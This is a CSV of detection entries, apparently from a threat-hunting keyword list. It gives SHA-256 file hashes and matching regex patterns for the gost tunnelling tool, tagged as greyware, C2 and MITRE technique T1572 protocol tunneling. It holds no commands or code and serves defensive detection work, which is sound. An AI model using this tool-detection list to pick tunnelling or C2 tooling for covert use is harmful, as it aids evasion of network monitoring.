"*49e7c86340e6930402911320150a14e5aad183efafb8b56747d97a8a5469a187*",".{0,1000}49e7c86340e6930402911320150a14e5aad183efafb8b56747d97a8a5469a187.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*4c8a17db253b2eb5af4596e93f8f766f815546c3b40700e8d88baac680a579a9*",".{0,1000}4c8a17db253b2eb5af4596e93f8f766f815546c3b40700e8d88baac680a579a9.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*4d66ce63e4917a7e2749a851733faca18a04ab2a289aa5650ca99a7f806a3c7f*",".{0,1000}4d66ce63e4917a7e2749a851733faca18a04ab2a289aa5650ca99a7f806a3c7f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*4d7fa7fbfca88ec9adb9e227f4049a544acd312dd5c3a4d4f936e053497b7d65*",".{0,1000}4d7fa7fbfca88ec9adb9e227f4049a544acd312dd5c3a4d4f936e053497b7d65.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*4ee1ee85ab16e36d6dbc5b4d8795375bb10edab50e451eed5adf69ddd4792575*",".{0,1000}4ee1ee85ab16e36d6dbc5b4d8795375bb10edab50e451eed5adf69ddd4792575.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*52820d7c8b0fad129a6d4d4e631d627dbf63263c0c720569afbc43da085198cb*",".{0,1000}52820d7c8b0fad129a6d4d4e631d627dbf63263c0c720569afbc43da085198cb.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*546505f3c8cb7cbe041b77cafa77a673bd38285e3de9918825f2f7f4fa773299*",".{0,1000}546505f3c8cb7cbe041b77cafa77a673bd38285e3de9918825f2f7f4fa773299.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5472468e92c54af495a753b9feb24fa90aa0e0d321bebb9c688fe5c9210a1ae7*",".{0,1000}5472468e92c54af495a753b9feb24fa90aa0e0d321bebb9c688fe5c9210a1ae7.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*54d32b6689f4ae55b5402f89cca28cdd4889798022d1aee11674a4e506cfc7e5*",".{0,1000}54d32b6689f4ae55b5402f89cca28cdd4889798022d1aee11674a4e506cfc7e5.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*557366669af1df330ca6a7f7488ff60b77ac3f99cfc8568a9759ce24d55563e5*",".{0,1000}557366669af1df330ca6a7f7488ff60b77ac3f99cfc8568a9759ce24d55563e5.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*564a0f3db972920e005a53d22f8062e10652bcb9fa9e2ec4218fa16446c2c344*",".{0,1000}564a0f3db972920e005a53d22f8062e10652bcb9fa9e2ec4218fa16446c2c344.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*56affb1b7a635c42aa5009f45a7f2e7a1bf7fcbe6c19a4c66a89872c2f2a991f*",".{0,1000}56affb1b7a635c42aa5009f45a7f2e7a1bf7fcbe6c19a4c66a89872c2f2a991f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*58553520765d913785914cb41570a76668b07e43c40d313841f7c03fddc899cd*",".{0,1000}58553520765d913785914cb41570a76668b07e43c40d313841f7c03fddc899cd.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5952611ae5f32afa4649c7414dab74436554ca71518ec8bf941041673818a639*",".{0,1000}5952611ae5f32afa4649c7414dab74436554ca71518ec8bf941041673818a639.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5babcba4005adce8f620995f2a56e5d6bdcf6695f52a539bdaeaff889d47e8b5*",".{0,1000}5babcba4005adce8f620995f2a56e5d6bdcf6695f52a539bdaeaff889d47e8b5.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5bd56a5da478c542e8265d5fd15fe8ba90f720bbb6a2649ea6c4ddd5acb77d85*",".{0,1000}5bd56a5da478c542e8265d5fd15fe8ba90f720bbb6a2649ea6c4ddd5acb77d85.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5c089eabdf1c1446168d69c1efad0fae0d0217d8a671539bf859fe823248850d*",".{0,1000}5c089eabdf1c1446168d69c1efad0fae0d0217d8a671539bf859fe823248850d.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5c89234b305a4a87b77598e6c4490a789cf9312575e3490f226a301bbe76d3e9*",".{0,1000}5c89234b305a4a87b77598e6c4490a789cf9312575e3490f226a301bbe76d3e9.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5d2fec2dafb0fd853fa2ff9d4b1314fe47470b59ce0b4d2f3e004d8f4b2bb339*",".{0,1000}5d2fec2dafb0fd853fa2ff9d4b1314fe47470b59ce0b4d2f3e004d8f4b2bb339.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5d80f05f43ad9ed6f6e2ed7ec55dbac0a987e58eac50129772a27ac2ad5ebeff*",".{0,1000}5d80f05f43ad9ed6f6e2ed7ec55dbac0a987e58eac50129772a27ac2ad5ebeff.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5e0426cef7b6c07eb8844af83c77aed5deae6b05e380690f83acbcead46cfe99*",".{0,1000}5e0426cef7b6c07eb8844af83c77aed5deae6b05e380690f83acbcead46cfe99.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5e08786b4e4cf505b679ee2e3e03922b9886d6876aa406b123b791cd94497ee0*",".{0,1000}5e08786b4e4cf505b679ee2e3e03922b9886d6876aa406b123b791cd94497ee0.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5ef00c89ac391313af63b02f4f8a1fa5509c6a6bddf98c2299a765548cae5ff8*",".{0,1000}5ef00c89ac391313af63b02f4f8a1fa5509c6a6bddf98c2299a765548cae5ff8.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*5fa64857a76906be355e08a22e0183096bc92e63747a216217356daec482bb7d*",".{0,1000}5fa64857a76906be355e08a22e0183096bc92e63747a216217356daec482bb7d.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*60cd72287033962ecbbe8c27c7cb84dd7aeabd183a338ca4195a5b5275138076*",".{0,1000}60cd72287033962ecbbe8c27c7cb84dd7aeabd183a338ca4195a5b5275138076.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*62d7b075905119d8ab637df0f4348aca30ede58adacfe6d05cd3951db128ba91*",".{0,1000}62d7b075905119d8ab637df0f4348aca30ede58adacfe6d05cd3951db128ba91.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*630206b6d7b631b431907ab292ab6576e73bee49a3da3456b9caaf2ab8c027d0*",".{0,1000}630206b6d7b631b431907ab292ab6576e73bee49a3da3456b9caaf2ab8c027d0.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*6419610ef4957f7d62fdd16b22764a68ff694a612449195b932d169f523ffe20*",".{0,1000}6419610ef4957f7d62fdd16b22764a68ff694a612449195b932d169f523ffe20.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*6486fce494f85803b4abd3c18cadd14aa65cda411ed3511a598a7628ef2fd1de*",".{0,1000}6486fce494f85803b4abd3c18cadd14aa65cda411ed3511a598a7628ef2fd1de.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*666e400ed79f20f4f846cfe6bbcf9fb90fbff447695d217731ed5f830afb2f3f*",".{0,1000}666e400ed79f20f4f846cfe6bbcf9fb90fbff447695d217731ed5f830afb2f3f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*66eda7f0e6f85ede326a715db2d5796a163595fdcf8f8c5240b2cfe509ef738e*",".{0,1000}66eda7f0e6f85ede326a715db2d5796a163595fdcf8f8c5240b2cfe509ef738e.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*67402a451ff767c1045a79d5ee001f255f9b5898c67f76cd021c586e0998c0dd*",".{0,1000}67402a451ff767c1045a79d5ee001f255f9b5898c67f76cd021c586e0998c0dd.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*681f20b796bc6b59048b2eecf7a05884cfb1ea2464a14364f0769a10077bfb5b*",".{0,1000}681f20b796bc6b59048b2eecf7a05884cfb1ea2464a14364f0769a10077bfb5b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*6844205e2b4a41577969581d5447a6d0661cf885daacf50092c777ff4f85328b*",".{0,1000}6844205e2b4a41577969581d5447a6d0661cf885daacf50092c777ff4f85328b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*68715639afd1f47089068f9de486068471fce5fca4a07aef888f960b73b09d56*",".{0,1000}68715639afd1f47089068f9de486068471fce5fca4a07aef888f960b73b09d56.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*68b38ba64f0639f6c5b7c95e2d19676574cf9cfb2034748c46d89811546f3d88*",".{0,1000}68b38ba64f0639f6c5b7c95e2d19676574cf9cfb2034748c46d89811546f3d88.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*68b38ba64f0639f6c5b7c95e2d19676574cf9cfb2034748c46d89811546f3d88*",".{0,1000}68b38ba64f0639f6c5b7c95e2d19676574cf9cfb2034748c46d89811546f3d88.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*696fa827e966020026d3d380e63529eb5075a608332788bffd1ca2aadb94062e*",".{0,1000}696fa827e966020026d3d380e63529eb5075a608332788bffd1ca2aadb94062e.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*6a986a22cb9ff63cf0f9c7ac240eada15806a6b1bc86c61242ccb73d8a24ac23*",".{0,1000}6a986a22cb9ff63cf0f9c7ac240eada15806a6b1bc86c61242ccb73d8a24ac23.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*6eba09a7e386379e173bea81ca5de348bef4c0f024d2efa963ab8d3bb8b37a8e*",".{0,1000}6eba09a7e386379e173bea81ca5de348bef4c0f024d2efa963ab8d3bb8b37a8e.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*6edca5b408b075285b85db4ebfe180dc86695c387f5005f58af8c53a7d36b1a8*",".{0,1000}6edca5b408b075285b85db4ebfe180dc86695c387f5005f58af8c53a7d36b1a8.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*6edcee9130bc97aac10f1d04e9a3c86b20c38a66c1aeed24c4e2244cddfd98ea*",".{0,1000}6edcee9130bc97aac10f1d04e9a3c86b20c38a66c1aeed24c4e2244cddfd98ea.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*6ee659ad14046e38ef7a00c2afe4785674015a5ab08cdf78cf40fa2eb11a891e*",".{0,1000}6ee659ad14046e38ef7a00c2afe4785674015a5ab08cdf78cf40fa2eb11a891e.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7455b514720dacb5dadbf5c3cc1a69614ded8375ebe23daf0778441af6da907d*",".{0,1000}7455b514720dacb5dadbf5c3cc1a69614ded8375ebe23daf0778441af6da907d.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*748db6b8df67896f3adf369e785365c439ec5500daaf480e932adbbfd28ac0da*",".{0,1000}748db6b8df67896f3adf369e785365c439ec5500daaf480e932adbbfd28ac0da.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7521ae02982e13b74da0f4b9781b66394ffe8755b5d8c2dc3c67eedbb8591729*",".{0,1000}7521ae02982e13b74da0f4b9781b66394ffe8755b5d8c2dc3c67eedbb8591729.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7535ea41cfd717ec0beb5dbc2671b7c66e1fb34ef904313899946f297d943e6b*",".{0,1000}7535ea41cfd717ec0beb5dbc2671b7c66e1fb34ef904313899946f297d943e6b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*75e170822ea113698c86a194968b088f62e391d9f1151f3b3184decdd8d30d35*",".{0,1000}75e170822ea113698c86a194968b088f62e391d9f1151f3b3184decdd8d30d35.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*772d623dd57c74226010fd7b330a5e6cf7a6b59ae37fc4dc9a6b47fe46756d99*",".{0,1000}772d623dd57c74226010fd7b330a5e6cf7a6b59ae37fc4dc9a6b47fe46756d99.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*789b38bc3c55852ece5657fe808a7aec867a151f8a3f7fe648adcd15172e6278*",".{0,1000}789b38bc3c55852ece5657fe808a7aec867a151f8a3f7fe648adcd15172e6278.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*790bfe46db189eba7c8d9464da34ec62511b9b2f3ef0889162a5682910563875*",".{0,1000}790bfe46db189eba7c8d9464da34ec62511b9b2f3ef0889162a5682910563875.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*79c98d35d02ac92c72aadf48a1ca55e2b7afe5a41ad70e5cf0467c50a84dce22*",".{0,1000}79c98d35d02ac92c72aadf48a1ca55e2b7afe5a41ad70e5cf0467c50a84dce22.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7b23bad83e3921e1d9e528b69b7d643b646231e5b736f8588698326c527e31a7*",".{0,1000}7b23bad83e3921e1d9e528b69b7d643b646231e5b736f8588698326c527e31a7.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7c772e7a840bfa0fa04609f6b8b2938acdb565493514d85146ccf589f04cf12a*",".{0,1000}7c772e7a840bfa0fa04609f6b8b2938acdb565493514d85146ccf589f04cf12a.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7cbcaba89fb2dfe22cbeeaf2426379560f015d49f4dad0caf2cd732146d96b84*",".{0,1000}7cbcaba89fb2dfe22cbeeaf2426379560f015d49f4dad0caf2cd732146d96b84.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7eda8b7dbce7550e3d56092a4f4bdfe23df822c33e9b5cf20ff986946f8882b0*",".{0,1000}7eda8b7dbce7550e3d56092a4f4bdfe23df822c33e9b5cf20ff986946f8882b0.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7f27f414ebe84f189adc68a963c7735d4cef34307a19cd0c21243ec202f9f456*",".{0,1000}7f27f414ebe84f189adc68a963c7735d4cef34307a19cd0c21243ec202f9f456.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*7ff4e1c0fb6e485d203b3d484b44de78e00caf0c84be600e8ef94062005b7b9b*",".{0,1000}7ff4e1c0fb6e485d203b3d484b44de78e00caf0c84be600e8ef94062005b7b9b.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8067eadec99ed1f3d97a706a29bc7d2713c4d163973b383513cf41641e7c0c8c*",".{0,1000}8067eadec99ed1f3d97a706a29bc7d2713c4d163973b383513cf41641e7c0c8c.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8154e009a82ae62f597ac8b9da160feb7d74125987bfa3a65283ec19583a292f*",".{0,1000}8154e009a82ae62f597ac8b9da160feb7d74125987bfa3a65283ec19583a292f.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*85057ff4c0fc97cb3b9b269c2bdddc0611cdbd7d748c52a2e4d949de9cdfb157*",".{0,1000}85057ff4c0fc97cb3b9b269c2bdddc0611cdbd7d748c52a2e4d949de9cdfb157.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8579d38432b7652643a84d0fd7edbc78668ca3f91ddc1d78ee8840a7a35fa9b7*",".{0,1000}8579d38432b7652643a84d0fd7edbc78668ca3f91ddc1d78ee8840a7a35fa9b7.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*8768fb4f5c0829e3ed696af614ff761ca72b5538bef2073464f57eadc76f5ed4*",".{0,1000}8768fb4f5c0829e3ed696af614ff761ca72b5538bef2073464f57eadc76f5ed4.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
"*87a25f52f233c1176eeeab554a2941f1738a9e86669fb7febe8155d15ddf5530*",".{0,1000}87a25f52f233c1176eeeab554a2941f1738a9e86669fb7febe8155d15ddf5530.{0,1000}","greyware_tool_keyword","gost","GO Simple Tunnel - a simple tunnel written in golang","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/go-gost/gost","1","0","#filehash","N/A","10","10","3965","489","2024-08-06T15:33:51Z","2020-02-12T14:58:08Z"
